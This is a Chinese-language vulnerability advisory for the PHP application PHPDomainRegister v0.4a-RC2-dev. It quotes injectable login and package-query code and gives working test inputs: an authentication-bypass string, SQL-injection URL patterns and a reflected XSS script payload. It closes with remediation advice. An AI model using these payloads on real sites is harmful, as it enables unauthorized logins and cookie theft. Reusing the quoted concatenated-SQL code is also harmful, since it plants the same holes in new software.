

PHPDomainRegister v0.4a-RC2-dev多个缺陷及修复 - 网站安

标题:PHPDomainRegister v0.4a-RC2-dev => [SQL Auth][SQL Inject][XSS]
作者:Or4nG.M4n
下载地址:http://garr.dl.sourceforge.net/project/phpdr/v0.4b%20-%20RC2.rar
致谢:
+----------------------------------+
|   xSs m4n i-Hmx Cyber-Crystal    |
|   Dr.Bnned ahwak2000 sa^Dev!L    |
+----------------------------------+

SQL Auth Bypass
缺陷位置: class_AjaxLogin.php line 73

    function is_login() { <<<<==== 1
        include ('config.php'); <<<<==== 2
        if(isset($_POST['username']))  { <<<<==== 3
            $_SESSION['username']   = $_POST['username']; <<<<==== 4
            $password   = $_POST['password']; <<<<==== 5
            $strSQL     = <<<<==== 6
                "SELECT
                        *
                FROM
                        `".$_SQL_PREFIX . $USER_Table_Name."`
                WHERE
                        `LOGIN_NAME` = '".$_SESSION['username']."'
                AND
                        password = md5('".$password."');"; <<<<==== 7
            $result  = mysql_query ($strSQL); <<<<==== 8
            $row     = mysql_fetch_row($result); <<<<==== 9
            $exist   = count($row); <<<<==== 10
            if($exist >=2) { $this->jscript_location();  } <<<<==== 11

[jscript_location]

    function jscript_location() { <<<<==== 12
        $this->set_session(); <<<<==== 13
        echo "<script> $('#container').fadeOut();window.location.href='".SUCCESS_LOGIN_GOTO."'</script>"; <<<<==== 14

测试方法: just login as => admin ' or 1=1 #

SQL injection
缺陷位置: admin/index.php line 212

    $sql = "SELECT name, price, disc, disc2, webspace FROM ".$_SQL_PREFIX."packages WHERE `id` = ".$_GET['pid'].";"; <<<<==== 1
    $getpack = mysql_query($sql); <<<<==== 2

line 1079

    showPacket($pid); <<<<==== 3

缺陷代码: index.php line 617

    $SQL = "SELECT * FROM ".$_SQL_PREFIX."packages
    where id = ".$_GET['pid'].""; <<<<==== 1
    $result = mysql_query($SQL); <<<<==== 2

测试方法:
http://<站点地址>/index.php?usetype=domainauswahl&pid=%injectionhere%&use=Details
admin/index.php?show=showPacket&pid=%injectionhere%
Sql to xss to get cookie

Cross Site Scripting [xss]
admin/index.php?show=domains&do=delFirmadomains&domain=<script>alert(7);</script>

修复建议(原文未给出修复内容,以下仅依据上面列出的代码整理):
- 登录查询和两处 pid 查询都把 $_POST / $_GET 的值直接拼接进 SQL 字符串。应改用 PDO 或 mysqli 的预处理语句绑定参数;pid 这类数字参数还应先做整数校验(例如 ctype_digit() 或 (int) 转换)。
- is_login() 在校验密码之前就把 $_POST['username'] 写入 $_SESSION['username'](标记 4)。应在验证通过之后再写入会话。
- 密码以 md5() 比对,说明库中存的是 MD5 摘要。应迁移到 password_hash() / password_verify()。
- domain 参数对应的输出代码原文没有列出。若属于直接回显,输出到 HTML 之前应经 htmlspecialchars($value, ENT_QUOTES, 'UTF-8') 处理。
- mysql_* 扩展自 PHP 5.5 起废弃,并在 PHP 7.0 中移除,修复时应一并更换数据库接口。

